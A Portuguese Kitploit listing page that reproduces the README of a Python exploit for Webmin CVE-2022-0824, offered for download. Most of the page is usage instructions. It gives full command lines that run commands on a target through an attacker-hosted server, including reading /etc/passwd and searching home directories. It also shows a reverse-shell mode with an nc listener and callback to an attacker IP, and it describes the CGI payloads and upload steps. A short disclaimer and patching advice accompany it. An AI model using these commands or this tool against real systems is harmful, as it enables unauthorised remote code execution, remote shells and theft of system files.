Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Exploit em Python para Webmin CVE-2022-0824 com suporte a dois modos: execução direta de comandos e reverse shell. Inclui múltiplos tipos de payload, gerenciamento inteligente de arquivos e logging de depuração detalhado para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoGeração de Shellcode
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Exploit em Python para Webmin CVE-2022-0824 com suporte a dois modos: execução direta de comandos e reverse shell. Inclui múltiplos tipos de payload, gerenciamento inteligente de arquivos e logging de depuração detalhado para testes de segurança autorizados.

Ver Repositório
7há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Ferramenta de exploração aprimorada para Webmin CVE-2022-0824 - suporta dois modos: execução de comandos e reverse shell

Python Version License CVE

[!IMPORTANT]

Uma ferramenta de exploração aprimorada para a vulnerabilidade Webmin CVE-2022-0824, que suporta dois modos: execução direta de comandos e reverse shell.

🚀 Recursos

  • ✅ Suporte a dois modos: modo de execução de comandos + modo reverse shell
  • ✅ Múltiplos payloads: três payloads diferentes: Perl, Bash e Python
  • ✅ Gerenciamento inteligente de arquivos: gera automaticamente nomes de arquivo únicos para evitar conflitos
  • ✅ Upload com sobrescrita forçada: trata automaticamente a sobrescrita de arquivos já existentes
  • ✅ Múltiplos métodos de upload: download via HTTP, upload direto, criação via execução de comandos
  • ✅ Informações detalhadas de depuração: logs completos do processo de execução
  • ✅ Interface amigável: saída colorida e indicações claras de status

📋 Informações da Vulnerabilidade

  • Número do CVE: CVE-2022-0824
  • Versões afetadas: Webmin < 1.990
  • Tipo de vulnerabilidade: execução remota de código causada por upload arbitrário de arquivos
  • Pontuação CVSS: 9.8 (Crítica)

🛠️ Requisitos de Instalação

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 Como Usar

Modo de execução de comandos (Recomendado)

root@kitploit:~
# 基本命令执行
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# 查看系统信息
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# 列出文件
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# 查看敏感文件
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# 网络信息
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

Modo Reverse Shell

root@kitploit:~
# 1. 启动监听器
nc -nlvp 9999

# 2. 执行漏洞利用
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 Descrição dos Parâmetros

ParâmetroDescriçãoObrigatórioExemplo
-t, --targetURL do Webmin de destino✅http://192.168.1.100:10000/
-c, --credentialCredenciais de login✅admin:password
-LS, --py3http_serverEndereço do servidor HTTP✅192.168.1.50:8080
--shellComando a ser executado❌"ls -la"
-L, --callback_ipIP de callback do reverse shell❌*192.168.1.50
-P, --callback_portPorta de callback do reverse shell❌*9999

*Nota: obrigatório no modo Reverse Shell

🎯 Exemplos de Uso

Exemplo 1: Coleta de informações do sistema

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

Exemplo 2: Exploração do sistema de arquivos

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

Exemplo 3: Visualização da configuração de rede

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 Como Funciona

  1. Autenticação: efetua login na interface de administração do Webmin usando as credenciais fornecidas
  2. Geração de payload: gera o script CGI correspondente de acordo com o modo
  3. Upload de arquivo: envia o payload por meio do recurso de download HTTP do gerenciador de arquivos
  4. Definição de permissões: define permissões de execução para o arquivo enviado
  5. Execução de comandos: acessa o script CGI enviado para executar comandos ou estabelecer uma conexão reversa

🛡️ Recomendações de Proteção

  • Atualize o Webmin para a versão mais recente (>= 1.990)
  • Restrinja o acesso de rede à interface de administração do Webmin
  • Use senhas fortes e autenticação de dois fatores
  • Audite regularmente os logs do sistema
  • Implante um firewall de aplicação web (WAF)

⚠️ Aviso Legal

Esta ferramenta deve ser usada apenas para testes de segurança autorizados e fins educacionais.

  • 🚫 Proibido o uso em sistemas não autorizados
  • 🚫 Proibido o uso para ataques maliciosos
  • 🚫 O usuário é responsável pelas consequências legais
  • ✅ Use apenas em ambientes com autorização explícita
  • ✅ Use para pesquisa de segurança e verificação de vulnerabilidades

📚 Detalhes Técnicos

Tipos de Payload

  • Perl CGI: payload principal, melhor compatibilidade
  • Bash CGI: payload reserva, adequado para sistemas Linux
  • Python CGI: payload reserva, mais rico em funcionalidades

Métodos de Upload

  1. Download via HTTP: por meio do recurso de download remoto do gerenciador de arquivos do Webmin
  2. Upload direto: por meio da interface de upload de arquivos
  3. Criação via comando: cria o arquivo por meio de comandos do sistema

Estratégia de Nomenclatura de Arquivos

  • Hash MD5 baseado no conteúdo do comando
  • Sufixo de timestamp
  • Garante nomes de arquivo diferentes a cada execução

🔄 Histórico de Atualizações

v5.0 (2025-08-05)

  • ✨ Novo modo de execução de comandos
  • 🐛 Corrigido problema de sobrescrita de arquivos
  • 🔧 Estratégia de nomenclatura de arquivos aprimorada
  • 📈 Tratamento de erros aprimorado

v4.0 (Baseado na versão original)

  • 🎯 Baseado no código original de faisalfs10x
  • 🔧 Compatibilidade com CGI aprimorada
  • 📝 Logs detalhados adicionados

🤝 Contribuição

Contribuições são bem-vindas! Envie Issues e Pull Requests!

  1. Fork este projeto
  2. Crie um branch de recurso (git checkout -b feature/AmazingFeature)
  3. Faça commit das alterações (git commit -m 'Add some AmazingFeature')
  4. Envie para o branch (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

📄 Licença

Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes

🙏 Agradecimentos

  • Autor do código original: @faisalfs10x
  • Endereço do projeto original: Webmin-CVE-2022-0824-revshell
  • Descobridor da CVE: pesquisadores de segurança relevantes

📞 Contato

Em caso de dúvidas ou sugestões, entre em contato pelos seguintes meios:

  • 📧 Abra uma Issue no GitHub
  • 🐛 Para reportar problemas de segurança, envie uma mensagem privada

⭐ Se este projeto foi útil para você, dê um Star para apoiar!

🔗 Links Relacionados

  • Detalhes do CVE-2022-0824
  • Site oficial do Webmin
  • Projeto original

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
Baixar ferramenta